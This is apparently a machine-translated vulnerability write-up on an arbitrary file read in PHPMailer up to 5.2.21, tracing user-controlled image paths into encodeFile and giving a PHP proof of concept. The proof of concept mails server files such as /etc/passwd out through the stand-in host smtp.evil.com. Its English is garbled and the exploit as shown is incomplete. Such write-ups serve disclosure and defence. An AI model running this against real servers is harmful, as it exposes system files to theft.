Details source: http://www.freebuf.com/vuls/124820.html
Author: Yxlink
Affected versions:
PHPMailer <= 5.2.21
High-risk
Vulnerability file function: class.phpmailer.php the encodeFile function.
The function receives a $path
variable, and finally the $path
variable’s value into the file_get_contents
function to perform. If the$path variable can be controlled to an arbitrary file reads:
By tracking found AddAttachment and AddEmbeddedImage function finally will be called to encode the File function. AddAttachment function of the role is to send in the mail attachment, if the attachment name can be controlled to trigger the vulnerability.
The main view AddEmbeddedImage function which is processing the message content in the picture, now as long as the$path may be controlled to trigger the vulnerability. Now is to find the controllable points:
Backtracking this function is found msgHTML function calls the function msgHTML function is used to send html format mail, the call process is as follows:
Back $filename
to see if it can be controlled from the code can be seen in the$filename from$url assignment. IE:$filename = basename($url);
Then to keep track of the $url:
$url
is by parsing$message
. src=”xxxxx”,$url is eventually parsed is xxxxx, and $message
is what we send mail to custom content. This allows control points to find, you can successfully exploit the vulnerability.
`` <? php
require_once(‘PHPMailerAutoload.php’); $mail = new PHPMailer(); $mail->IsSMTP(); $mail->Host = “smtp.evil.com”; $mail->Port = 25; $mail->SMTPAuth = true;
$mail->CharSet = “UTF-8”; $mail->Encoding = “base64”;
$mail->Username = “[email protected]”; $mail->Password = “tes1234t”; $mail->Subject = “hello”;
$mail->From = “[email protected]”; $mail->FromName = “test”;
$address = “[email protected]”; $mail->AddAddress($address, “test”);
$mail->AddAttachment(‘test.txt’,‘test.txt’); //the test. txt can be controlled to an arbitrary file read $mail->IsHTML(true); $msg=“test”;//mail content-such as writing. $mail->msgHTML($msg);
if(!$ mail->Send()) { echo “Mailer Error:” . $mail->ErrorInfo; } else { echo “Message sent!”; } ?> ``
With$msg the content to your mailbox send an email, you can get to the server’s/etc/passwd content. As shown in Figure: